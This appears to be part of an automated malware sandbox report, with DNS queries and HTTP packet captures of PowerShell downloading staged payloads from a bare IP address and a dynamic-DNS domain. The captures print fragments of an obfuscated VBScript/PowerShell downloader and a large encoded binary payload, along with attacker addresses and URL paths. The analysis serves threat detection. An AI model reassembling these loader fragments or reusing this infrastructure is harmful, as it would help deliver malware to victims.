                                                                                                                                                                                                                                Nov 18, 2024 16:53:20.913058043 CET1.1.1.1192.168.2.80x3204No error (0)nextnewupdationsforu.duckdns.org192.227.228.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.971534967 CET1.1.1.1192.168.2.80xe12cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.565247059 CET1.1.1.1192.168.2.80x4803No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.748697996 CET1.1.1.1192.168.2.80xbf45No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.748697996 CET1.1.1.1192.168.2.80xbf45No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.780034065 CET1.1.1.1192.168.2.80xb2fcNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.538750887 CET1.1.1.1192.168.2.80x5808No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.538750887 CET1.1.1.1192.168.2.80x5808No error (0)googlehosted.l.googleusercontent.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.050590038 CET1.1.1.1192.168.2.80x2c58No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.050590038 CET1.1.1.1192.168.2.80x2c58No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748486996 CET1.1.1.1192.168.2.80x67c2No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748486996 CET1.1.1.1192.168.2.80x67c2No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748486996 CET1.1.1.1192.168.2.80x67c2No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748486996 CET1.1.1.1192.168.2.80x67c2No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.755809069 CET1.1.1.1192.168.2.80x45a0No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.759105921 CET1.1.1.1192.168.2.80x5979No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.766096115 CET1.1.1.1192.168.2.80x1b91No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.052838087 CET1.1.1.1192.168.2.80x2c58No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.052838087 CET1.1.1.1192.168.2.80x2c58No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.064677954 CET1.1.1.1192.168.2.80x2c58No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.064677954 CET1.1.1.1192.168.2.80x2c58No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:48.063422918 CET1.1.1.1192.168.2.80x2c58No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:48.063422918 CET1.1.1.1192.168.2.80x2c58No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:52.063488960 CET1.1.1.1192.168.2.80x2c58No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:52.063488960 CET1.1.1.1192.168.2.80x2c58No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • 1017.filemail.com
                                                                                                                                                                                                                                • api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                • clients2.googleusercontent.com
                                                                                                                                                                                                                                • 23.94.171.138
                                                                                                                                                                                                                                • geoplugin.net

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.84970523.94.171.138807628C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Nov 18, 2024 16:52:22.917340040 CET345OUTGET /329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF HTTP/1.1
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                Host: 23.94.171.138
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601640940 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 18 Nov 2024 15:52:23 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                                Last-Modified: Mon, 18 Nov 2024 06:00:22 GMT
                                                                                                                                                                                                                                ETag: "22650-62729a1d1dadd"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 140880
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: image/tiff
                                                                                                                                                                                                                                Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 61 00 74 00 72 00 6f 00 63 00 65 00 6d 00 65 00 6e 00 74 00 65 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 6c 00 74 00 65 00 72 00 6e 00 69 00 70 00 65 00 6e 00 6e 00 65 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 65 00 6d 00 70 00 61 00 72 00 65 00 64 00 61 00 72 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 6d 00 61 00 69 00 6f 00 72 00 69 00 6e 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 66 00 75 00 6c 00 69 00 67 00 69 00 6e 00 6f 00 73 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 66 00 75 00 6c 00 69 00 67 00 69 00 6e 00 6f 00 73 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 61 00 6c 00 74 00 65 00 72 00 6e 00 69 00 70 00 65 00 6e 00 6e 00 65 00 2c 00 20 00 65 00 6d 00 70 00 61 00 72 00 65 00 64 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 66 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: Function atrocemente(ByVal alternipenne, ByVal emparedar, ByVal maiorino) Dim fuliginoso fuliginoso = InStr(alternipenne, emparedar) Do While fuliginoso > 0 alternipenne = Left(alternipenne, fuliginoso - 1) & maiorino & Mid(alternipenne, fuliginoso + Len(emparedar)) fuliginoso = InStr(fuliginoso + Len(maiorino), alternipenne, emparedar) Loop atrocemente = alternipenneEnd Functionprivate fun
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601675987 CET212INData Raw: 00 63 00 74 00 69 00 6f 00 6e 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74
                                                                                                                                                                                                                                Data Ascii: ction ReadStdIn() while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll w
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601691008 CET1236INData Raw: 00 65 00 6e 00 64 00 0d 00 0a 00 65 00 6e 00 64 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 49 00 66 00 20 00 4e 00 6f 00 74 00 20 00 65 00 78 00 74 00 65 00 6e 00 73 00 6f 00 28 00 29 00 20 00 54
                                                                                                                                                                                                                                Data Ascii: endend functionIf Not extenso() Then On Error Resume Next embasbacamento = "KPIVQSR
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601784945 CET1236INData Raw: 00 4e 00 49 00 54 00 6e 00 64 00 6c 00 59 00 6b 00 4e 00 73 00 61 00 57 00 56 00 75 00 64 00 43 00 35 00 45 00 62 00 33 00 64 00 75 00 62 00 47 00 38 00 6e 00 4b 00 79 00 64 00 68 00 5a 00 45 00 52 00 68 00 64 00 47 00 45 00 6f 00 63 00 30 00 68
                                                                                                                                                                                                                                Data Ascii: NITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGPIVQSRAZLDXBOTHV4dC5FbmNvZGluZ10n
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601802111 CET1236INData Raw: 00 67 00 50 00 49 00 56 00 51 00 53 00 52 00 41 00 5a 00 4c 00 44 00 58 00 42 00 4f 00 54 00 48 00 4d 00 43 00 41 00 50 00 49 00 56 00 51 00 53 00 52 00 41 00 5a 00 4c 00 44 00 58 00 42 00 4f 00 54 00 48 00 74 00 59 00 57 00 35 00 6b 00 49 00 48
                                                                                                                                                                                                                                Data Ascii: gPIVQSRAZLDXBOTHMCAPIVQSRAZLDXBOTHtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydPIVQSRAZLDXBOTHCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXg
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601819038 CET1236INData Raw: 00 61 00 43 00 6c 00 64 00 4f 00 33 00 4e 00 49 00 54 00 6d 00 4e 00 76 00 50 00 49 00 56 00 51 00 53 00 52 00 41 00 5a 00 4c 00 44 00 58 00 42 00 4f 00 54 00 48 00 62 00 57 00 31 00 68 00 62 00 6d 00 52 00 43 00 65 00 58 00 52 00 6c 00 63 00 79
                                                                                                                                                                                                                                Data Ascii: aCldO3NITmNvPIVQSRAZLDXBOTHbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJ" embasbacamento = embasbaca
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601838112 CET884INData Raw: 00 30 00 61 00 58 00 5a 00 68 00 5a 00 47 00 39 00 69 00 4e 00 45 00 59 00 73 00 49 00 47 00 49 00 30 00 52 00 6d 00 52 00 6c 00 63 00 32 00 46 00 30 00 61 00 58 00 5a 00 68 00 5a 00 47 00 39 00 69 00 4e 00 43 00 63 00 72 00 4a 00 30 00 59 00 73
                                                                                                                                                                                                                                Data Ascii: 0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFPIVQSRAZLDXBOTHkb
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602257013 CET1236INData Raw: 00 63 00 31 00 52 00 79 00 53 00 57 00 35 00 6e 00 58 00 56 00 74 00 44 00 53 00 47 00 46 00 79 00 58 00 54 00 4d 00 35 00 4b 00 53 00 35 00 53 00 52 00 58 00 42 00 73 00 59 00 55 00 4e 00 6c 00 4b 00 43 00 64 00 7a 00 50 00 49 00 56 00 51 00 53
                                                                                                                                                                                                                                Data Ascii: c1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzPIVQSRAZLDXBOTHSE4nLCckJykuUkVwbGFDZSgPIVQSRAZLDXBOTHnczdnJywnfCcpIHwmICggJFBzaG9tZVs
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602279902 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 69 00 65 00 64 00 61 00 20 00 3d 00 20 00 73 00 69 00 65 00 64 00 61 00 20 00 26 00 20 00 22 00 57 00 50 00 49 00 56 00 51 00 53 00 52 00 41 00 5a 00 4c 00 44 00 58 00 42 00 4f 00 54 00 48 00 6a
                                                                                                                                                                                                                                Data Ascii: sieda = sieda & "WPIVQSRAZLDXBOTHj" sieda = sieda & "PIVQSRAZLDXBOTHuxPIVQSRAZLDXBOTHd " sieda =
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602303028 CET1236INData Raw: 00 4c 00 44 00 58 00 42 00 4f 00 54 00 48 00 2e 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 69 00 65 00 64 00 61 00 20 00 3d 00 20 00 73 00 69 00 65 00 64 00 61 00 20 00 26 00 20 00 22 00 47 00 65 00 50 00 49 00 56
                                                                                                                                                                                                                                Data Ascii: LDXBOTH." sieda = sieda & "GePIVQSRAZLDXBOTHt" sieda = sieda & "StPIVQSRAZLDXBOTH" sieda = sie
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.606753111 CET1236INData Raw: 00 56 00 51 00 53 00 52 00 41 00 5a 00 4c 00 44 00 58 00 42 00 4f 00 54 00 48 00 6f 00 64 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 69 00 65 00 64 00 61 00 20 00 3d 00 20 00 73 00 69 00 65 00 64 00 61 00 20 00 26
                                                                                                                                                                                                                                Data Ascii: VQSRAZLDXBOTHod" sieda = sieda & "igPIVQSRAZLDXBOTHo))PIVQSRAZLDXBOTH" sieda = sieda & ";poPIVQSRAZLDXB


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.85564823.94.171.13880752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Nov 18, 2024 16:52:55.833884954 CET77OUTGET /329/FRSSDE.txt HTTP/1.1
                                                                                                                                                                                                                                Host: 23.94.171.138
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510338068 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 18 Nov 2024 15:52:56 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                                Last-Modified: Mon, 18 Nov 2024 05:52:23 GMT
                                                                                                                                                                                                                                ETag: "a0800-62729854ef0be"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 657408
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510385036 CET1236INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                                                                                                                                                Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510396957 CET1236INData Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
                                                                                                                                                                                                                                Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510416985 CET1236INData Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
                                                                                                                                                                                                                                Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510430098 CET848INData Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
                                                                                                                                                                                                                                Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510441065 CET1236INData Raw: 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44
                                                                                                                                                                                                                                Data Ascii: jD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeDi3Q4NAeDf3g3N0dDc3w2NodDZ3A2NcdDW3wzN4cDN3AyNccDG3QxNQcDD3gwNEYDQ2wjN4YDJ2AiNcYDG2QhNQYDD2gQN8XD+1QfNwXD71geNkXD41wdNYXD1
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510447979 CET1236INData Raw: 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f
                                                                                                                                                                                                                                Data Ascii: AAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIM
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510462046 CET424INData Raw: 68 54 64 34 38 47 4f 64 68 54 49 34 59 78 4e 43 65 7a 4d 33 45 67 4e 52 54 6a 30 30 51 4c 4e 74 53 54 6c 30 34 49 4e 2f 52 7a 62 30 67 47 4e 70 45 6a 58 41 41 41 41 49 42 41 42 51 43 41 50 30 77 44 47 36 73 76 4f 46 72 6a 47 36 6f 51 4f 77 6d 54
                                                                                                                                                                                                                                Data Ascii: hTd48GOdhTI4YxNCezM3EgNRTj00QLNtSTl04IN/Rzb0gGNpEjXAAAAIBABQCAP0wDG6svOFrjG6oQOwmTj5cVOFljD4MNO4iDi480NafDz3c8N6eDp344NHejZ3k0NDZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z7
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510507107 CET1236INData Raw: 6a 44 37 34 41 4e 4f 73 69 54 65 34 51 48 4f 76 68 44 5a 34 4d 44 4f 50 67 6a 43 34 55 77 4e 36 66 6a 33 33 63 38 4e 73 65 7a 70 33 49 36 4e 58 65 7a 65 33 73 32 4e 4b 64 54 52 33 41 30 4e 31 63 7a 45 33 45 67 4e 6a 62 6a 33 32 6b 74 4e 4f 62 6a
                                                                                                                                                                                                                                Data Ascii: jD74ANOsiTe4QHOvhDZ4MDOPgjC4UwN6fj33c8Nsezp3I6NXeze3s2NKdTR3A0N1czE3EgNjbj32ktNObjs20pNzZjb2kmNeZjQ2gjNdYDG2MhNIUD71cdNzWjr1kaNeWjg14VNxUDL1cSNcUDA0YPNYTz004MNDTzp00JNCSTf0gHNtRTU0cENsQzJ0ICNXMz+zE/MWPT0zw8MBPjjzo2MlNDYzU1M4MDFyAuM/KzpyIqMdKjk
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510520935 CET1236INData Raw: 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76
                                                                                                                                                                                                                                Data Ascii: suMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP22Tl9EXPq1TZ8UPP5sja6YrOxqjk5YZO1lTU5oUOFhD23E/NBTTZ0sFAAAAOAMA4AAAA9cfPQxDI7o/OdvzJ7sgOyqDm0k1M2PDpzA6McODmzQ5MQODjzg4MEODgzw3M4NDXwEKA
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.515561104 CET1236INData Raw: 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44
